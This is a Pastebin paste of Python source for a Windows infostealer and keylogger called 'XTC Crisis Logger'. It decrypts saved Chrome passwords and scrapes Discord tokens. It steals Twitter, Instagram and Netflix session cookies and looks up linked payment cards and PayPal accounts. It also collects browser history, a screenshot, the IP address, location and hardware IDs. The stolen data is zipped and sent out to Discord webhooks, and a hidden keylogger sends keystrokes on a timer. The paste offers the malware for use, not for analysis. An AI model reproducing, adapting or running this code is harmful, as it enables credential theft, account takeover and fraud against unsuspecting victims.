Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
- # ~ Developed by XTC CRACKED BY Hacker Bug ~ #
- #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
- import os
- import random
- import tkinter
- import time
- import threading
- import keyboard
- import sys
- import win32con
- import pyautogui as pyauto
- import browser_cookie3
- from tkinter import *
- from random import randint
- from threading import Timer
- from datetime import datetime
- from discord_webhook import DiscordWebhook, DiscordEmbed
- from json import loads, dumps
- from base64 import b64decode
- from sqlite3 import connect
- from shutil import copyfile
- from threading import Thread
- from win32crypt import CryptUnprotectData
- from Crypto.Cipher import AES
- from discord_webhook import DiscordEmbed, DiscordWebhook
- from subprocess import Popen, PIPE
- from urllib.request import urlopen, Request
- from requests import get
- from re import findall, search
- from win32api import SetFileAttributes, GetSystemMetrics
- from browser_history import get_history
- from prettytable import PrettyTable
- from platform import platform
- from getmac import get_mac_address as gma
- from psutil import virtual_memory
- from collections import defaultdict
- from zipfile import ZipFile, ZIP_DEFLATED
- from multiprocessing import freeze_support
- from tempfile import TemporaryDirectory
- from pyautogui import screenshot
- from random import choices
- from string import ascii_letters, digits
- SEND_REPORT_EVERY = 20
- WEBHOOK = ""
- website = ['discord.com', 'twitter.com', 'instagram.com', 'netflix.com']
- def get_screenshot(path):
- get_screenshot.scrn = screenshot()
- get_screenshot.scrn_path = os.path.join(
- path, f"Screenshot_{''.join(choices(list(ascii_letters + digits), k=5))}.png")
- get_screenshot.scrn.save(get_screenshot.scrn_path)
- def get_hwid():
- p = Popen('wmic csproduct get uuid', shell=True, stdout=PIPE, stderr=PIPE)
- return (p.stdout.read() + p.stderr.read()).decode().split('\n')[1]
- def get_user_data(tk):
- headers = {'Authorization': tk}
- response = get('https://discordapp.com/api/v6/users/@me',
- headers=headers).json()
- return [response['username'], response['discriminator'],
- response['email'], response['phone']]
- def has_payment_methods(tk):
- headers = {'Authorization': tk}
- response = get(
- 'https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers=headers).json()
- return response
- def cookies_grabber_mod(u):
- cookies = []
- browsers = ["chrome", "edge", "firefox",
- "brave", "opera", "vivaldi", "chromium"]
- for browser in browsers:
- try:
- cookies.append(
- str(getattr(browser_cookie3, browser)(domain_name=u)))
- except BaseException:
- pass
- return cookies
- def get_Personal_data():
- try:
- ip_address = urlopen(
- Request('https://api64.ipify.org')).read().decode().strip()
- country = urlopen(
- Request(f'https://ipapi.co/{ip_address}/country_name')).read().decode().strip()
- city = urlopen(
- Request(f'https://ipapi.co/{ip_address}/city')).read().decode().strip()
- except BaseException:
- city = "City not found -_-"
- country = "Country not found -_-"
- ip_address = "No IP found -_-"
- return [ip_address, country, city]
- def find_His():
- table = PrettyTable(padding_width=1)
- table.field_names = ["CurrentTime", "Link"]
- for his in get_history().histories:
- a, b = his
- if len(b) <= 100:
- table.add_row([a, b])
- else:
- x_ = b.split("//")
- x__, x___ = x_[1].count('/'), x_[1].split('/')
- if x___[0] != 'www.google.com':
- if x__ <= 5:
- b = f"{x_[0]}//"
- for p in x___:
- if x___.index(p) != len(x___) - 1:
- b += f"{p}/"
- if len(b) <= 100:
- table.add_row([a, b])
- else:
- table.add_row([a, f"{x_[0]}//{x___[0]}/[...]"])
- else:
- b = f"{x_[0]}//{x___[0]}/[...]"
- if len(b) <= 100:
- table.add_row([a, b])
- else:
- table.add_row([a, f"{x_[0]}//{x___[0]}/[...]"])
- return table.get_string()
- def get_encryption_key():
- local_state_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
- "Google", "Chrome", "User Data", "Local State")
- with open(local_state_path, "r", encoding="utf-8") as f:
- local_state = loads(f.read())
- return CryptUnprotectData(b64decode(local_state["os_crypt"]["encrypted_key"])[
- 5:], None, None, None, 0)[1]
- def decrypt_data(data, key):
- try:
- return AES.new(key, AES.MODE_GCM, data[3:15]).decrypt(
- data[15:])[:-16].decode()
- except BaseException:
- try:
- return str(CryptUnprotectData(data, None, None, None, 0)[1])
- except BaseException:
- return ""
- def main(dirpath):
- db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
- "Google", "Chrome", "User Data", "default", "Login Data")
- chrome_psw_list = []
- if os.path.exists(db_path):
- key = get_encryption_key()
- filename = os.path.join(dirpath, "ChromeData.db")
- copyfile(db_path, filename)
- db = connect(filename)
- cursor = db.cursor()
- cursor.execute(
- 'SELECT origin_url, username_value, password_value FROM logins')
- chrome_psw_list = []
- for url, user_name, pwd in cursor.fetchall():
- pwd_db = decrypt_data(pwd, key)
- if pwd_db:
- chrome_psw_list.append([user_name, pwd_db, url])
- cursor.close()
- db.close()
- for w in website:
- if w == website[0]:
- tokens = []
- def discord_tokens(path):
- for file_name in os.listdir(path):
- if not file_name.endswith(
- '.log') and not file_name.endswith('.ldb'):
- continue
- for line in [x.strip() for x in open(
- f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
- for regex in (
- r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
- for token in findall(regex, line):
- if token not in tokens:
- tokens.append(token)
- paths = [
- os.path.join(os.getenv('LOCALAPPDATA'), "Google", "Chrome",
- "User Data", "Default", "Local Storage", "leveldb"),
- os.path.join(os.getenv('APPDATA'), "Discord",
- "Local Storage", "leveldb"),
- os.path.join(os.getenv('APPDATA'),
- "Opera Software", "Opera Stable"),
- os.path.join(os.getenv('LOCALAPPDATA'), "BraveSoftware",
- "Brave-Browser", "User Data", "Default"),
- os.path.join(os.getenv('LOCALAPPDATA'), "Yandex",
- "YandexBrowser", "User Data", "Default"),
- os.path.join(os.getenv('APPDATA'), "discordptb"),
- os.path.join(os.getenv('APPDATA'), "discordcanary"),
- ]
- threads = []
- def find_wb(wb):
- if os.path.exists(wb):
- threads.append(Thread(target=discord_tokens, args=(wb,)))
- for j in paths:
- find_wb(j)
- for t in threads:
- t.start()
- t.join()
- elif w == website[1]:
- t_cookies, t_lst = ([] for _ in range(2))
- for b in cookies_grabber_mod(w):
- t_cookies.append(b.split(', '))
- for c in t_cookies:
- for y in c:
- if search(r"auth_token", y) is not None:
- t_lst.append(y.split(' ')[1].split("=")[1])
- elif w == website[2]:
- insta_cookies, insta_lst = ([] for _ in range(2))
- for b in cookies_grabber_mod(w):
- insta_cookies.append(b.split(', '))
- browser_ = defaultdict(dict)
- for c in insta_cookies:
- if all([search(r"ds_user_id", str(c)) is not None,
- search(r"sessionid", str(c)) is not None]):
- for y in c:
- conditions = [search(r"ds_user_id", y) is not None, search(
- r"sessionid", y) is not None]
- if any(conditions):
- browser_[insta_cookies.index(c)][conditions.index(True)] = y.split(' ')[
- 1].split("=")[1]
- for x in list(dict(browser_).keys()):
- insta_lst.append(list(dict(browser_)[x].items()))
- for x in insta_lst:
- for y in x:
- if x.index(y) != y[0]:
- x[x.index(y)], x[y[0]] = x[y[0]], x[x.index(y)]
- for x in insta_lst:
- for y in x:
- x[x.index(y)] = y[1]
- elif w == website[3]:
- n_cookies, n_lst = ([] for _ in range(2))
- for b in cookies_grabber_mod(w):
- n_cookies.append(b.split(', '))
- for c in n_cookies:
- for y in c:
- if search(r"NetflixId", y) is not None:
- data = y.split(' ')[1].split("=")[1]
- if len(data) > 80:
- n_lst.append([])
- for y in c:
- n_lst[-1].append({'domain': f"{website[3]}", "name": f"{y.split(' ')[1].split('=')[0]}",
- "value": f"{y.split(' ')[1].split('=')[1]}"})
- all_data_p = []
- for x in tokens:
- lst_b = has_payment_methods(x)
- try:
- for n in range(len(lst_b)):
- if lst_b[n]['type'] == 1:
- writable = [lst_b[n]['brand'], lst_b[n]['type'], lst_b[n]['last_4'], lst_b[n]
- ['expires_month'], lst_b[n]['expires_year'], lst_b[n]['billing_address']]
- if writable not in all_data_p:
- all_data_p.append(writable)
- elif lst_b[n]['type'] == 2:
- writable_2 = [lst_b[n]['email'], lst_b[n]
- ['type'], lst_b[n]['billing_address']]
- if writable_2 not in all_data_p:
- all_data_p.append(writable_2)
- except BaseException:
- pass
- return [tokens, list(set(t_lst)), list(set(tuple(element)
- for element in insta_lst)), all_data_p, chrome_psw_list, n_lst]
- def send_webhook(DISCORD_WEBHOOK_URLs):
- p_lst = get_Personal_data()
- with TemporaryDirectory(dir='.') as td:
- SetFileAttributes(td, win32con.FILE_ATTRIBUTE_HIDDEN)
- get_screenshot(path=td)
- main_info = main(td)
- discord_T, twitter_T, insta_T, chrome_Psw_t = (
- PrettyTable(padding_width=1) for _ in range(4))
- discord_T.field_names, twitter_T.field_names, insta_T.field_names, chrome_Psw_t.field_names, verified_tokens = [
- "Discord Tokens", "Username", "Email", "Phone"], ["Twitter Tokens [auth_token]"], ["ds_user_id", "sessionid"], ['Username / Email', 'password', 'website'], []
- for __t in main_info[4]:
- chrome_Psw_t.add_row(__t)
- for t_ in main_info[0]:
- try:
- lst = get_user_data(t_)
- username, email, phone = f"{lst[0]}#{lst[1]}", lst[2], lst[3]
- discord_T.add_row([t_, username, email, phone])
- verified_tokens.append(t_)
- except BaseException:
- pass
- for _t in main_info[1]:
- twitter_T.add_row([_t])
- for _t_ in main_info[2]:
- insta_T.add_row(_t_)
- pay_l = []
- for _p in main_info[3]:
- if _p[1] == 1:
- payment_card = PrettyTable(padding_width=1)
- payment_card.field_names = [
- "Brand", "Last 4", "Type", "Expiration", "Billing Adress"]
- payment_card.add_row(
- [_p[0], _p[2], "Debit or Credit Card", f"{_p[3]}/{_p[4]}", _p[5]])
- pay_l.append(payment_card.get_string())
- elif _p[1] == 2:
- payment_p = PrettyTable(padding_width=1)
- payment_p.field_names = ["Email", "Type", "Billing Adress"]
- payment_p.add_row([_p[0], "Paypal", _p[2]])
- pay_l.append(payment_p.get_string())
- files_names = [[os.path.join(td, "Discord Tokens.txt"), discord_T], [os.path.join(td, "Twitter Tokens.txt"), twitter_T], [
- os.path.join(td, "Instagram Tokens.txt"), insta_T], [os.path.join(td, "Chrome Pass.txt"), chrome_Psw_t]]
- for x_, y_ in files_names:
- if (y_ == files_names[0][1] and len(main_info[0]) != 0) or (y_ == files_names[1][1] and len(main_info[1]) != 0) or (
- y_ == files_names[2][1] and len(main_info[2]) != 0) or (y_ == files_names[3][1] and len(main_info[4]) != 0):
- with open(x_, 'w') as wr:
- wr.write(y_.get_string())
- all_files = [os.path.join(
- td, 'History.txt'), get_screenshot.scrn_path, os.path.join(td, "Payment Info.txt")]
- for n in main_info[5]:
- p = os.path.join(td, f'netflix_{main_info[5].index(n)}.json')
- with open(p, 'w') as f:
- f.write(dumps(n, indent=4))
- all_files.append(p)
- with open(all_files[0], 'w') as f:
- f.write(find_His())
- with ZipFile(os.path.join(td, 'data.zip'), mode='w', compression=ZIP_DEFLATED) as zip:
- if ('payment_card' or 'payment_p') in locals():
- with open(all_files[2], 'w') as f:
- for i in pay_l:
- f.write(f"{i}\n")
- for files_path in all_files:
- try:
- zip.write(files_path)
- except FileNotFoundError:
- pass
- for name_f, _ in files_names:
- if os.path.exists(name_f):
- zip.write(name_f)
- for URL in DISCORD_WEBHOOK_URLs:
- webhook = DiscordWebhook(url=URL, username='XTC Crisis Logger',
- avatar_url="https://cdn.discordapp.com/attachments/1025353342152605756/1025804863172530246/unknown.png")
- embed = DiscordEmbed(title='New victim !', color='f5eeee')
- embed.add_embed_field(
- name='SYSTEM USER INFO', value=f"`PC Username:` **{os.getenv('UserName')}**\n`PC Name:` **{os.getenv('COMPUTERNAME')}**\n`OS:` **{platform()}**\n", inline=False)
- embed.add_embed_field(
- name='IP USER INFO', value=f"`IP:` **{p_lst[0]}**\n`Country:` **{p_lst[1]}** :flag_{get(f'https://restcountries.com/v3/name/{p_lst[1]}').json()[0]['cca2'].lower()}:\n`City:` **{p_lst[2]}**\n`MAC:` **{gma()}**\n`HWID:` **{get_hwid()}**\n", inline=False)
- embed.add_embed_field(
- name='PC USER COMPONENT', value=f"\n`RAM:` **{round(virtual_memory().total / (1024.0 ** 3), 2)} GB**\n`Resolution:` **{GetSystemMetrics(0)}x{GetSystemMetrics(1)}**\n", inline=False)
- embed.add_embed_field(
- name='ACCOUNT GRABBED', value=f"` **{len(verified_tokens)}**\n`Twitter:` **{len(main_info[1])}**\n`Instagram:` **{len(main_info[2])}**\n`Netflix:` **{len(main_info[5])}**\n`Account Password Grabbed:` **{len(main_info[4])}**\n", inline=False)
- card_e, paypal_e = ":white_check_mark:" if 'payment_card' in locals(
- ) else ":x:", ":white_check_mark:" if 'payment_p' in locals() else ":x:"
- embed.add_embed_field(
- name='PAYMENT INFO FOUNDED', value=f":credit_card:`Debit or Credit Card:` {card_e}\n`Paypal:` {paypal_e}", inline=False)
- embed.set_footer(text='XTC Development')
- embed.set_timestamp()
- with open(os.path.join(td, "data.zip"), 'rb') as f:
- webhook.add_file(
- file=f.read(), filename=f"XTC Crisis Logger-{os.getenv('UserName')}.zip")
- webhook.add_embed(embed)
- webhook.execute()
- class Keylogger:
- def __init__(self, interval, report_method="webhook"):
- now = datetime.now()
- self.interval = interval
- self.report_method = report_method
- self.log = ""
- self.start_dt = now.strftime('%d/%m/%Y %H:%M')
- self.end_dt = now.strftime('%d/%m/%Y %H:%M')
- self.username = os.getlogin()
- def callback(self, event):
- name = event.name
- if len(name) > 1:
- if name == "space":
- name = " "
- elif name == "enter":
- name = "[ENTER]\n"
- elif name == "decimal":
- name = "."
- elif name == "backspace":
- name = "[BP]"
- else:
- name = name.replace(" ", "_")
- name = f"[{name.upper()}]"
- self.log += name
- def report_to_webhook(self):
- flag = False
- webhook = DiscordWebhook(url=WEBHOOK)
- if len(self.log) > 2000:
- flag = True
- path = os.environ["temp"] + "\\report.txt"
- with open(path, 'w+') as file:
- file.write(f"XTC Keylogger Report From {self.username} Time: {self.end_dt}\n\n")
- file.write(self.log)
- with open(path, 'rb') as f:
- webhook.add_file(file=f.read(), filename='report.txt')
- else:
- embed = DiscordEmbed(title=f"XTC Keylogger Report From ({self.username}) Time: {self.end_dt}", description=self.log)
- embed.set_footer(text='Crisis Key-Logger By XTC',
- icon_url='https://cdn.discordapp.com/attachments/807523886433566750/1000065017506430996/16DCA446-0681-47F6-8F97-05D7EA5E42E3.gif')
- embed.set_image(url='')
- embed.set_thumbnail(url='')
- embed.set_author(name='Crisis Key-Logger By XTC',
- icon_url='https://cdn.discordapp.com/attachments/807523886433566750/1000065017506430996/16DCA446-0681-47F6-8F97-05D7EA5E42E3.gif')
- webhook.add_embed(embed)
- webhook.execute()
- if flag:
- os.remove(path)
- def report(self):
- if self.log:
- if self.report_method == "webhook":
- self.report_to_webhook()
- self.log = ""
- timer = Timer(interval=self.interval, function=self.report)
- timer.daemon = True
- timer.start()
- def start(self):
- self.start_dt = datetime.now()
- keyboard.on_release(callback=self.callback)
- self.report()
- keyboard.wait()
- root= Tk()
- root.attributes("-alpha",0)
- root.overrideredirect(1)
- root.attributes("-topmost",1)
- if __name__ == "__main__":
- freeze_support()
- if len(sys.argv) == 1:
- send_webhook([webhook])
- else:
- del sys.argv[0]
- send_webhook(sys.argv)
- if __name__ == "__main__":
- keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="webhook")
- keylogger.start()
Add Comment
Please, Sign In to add comment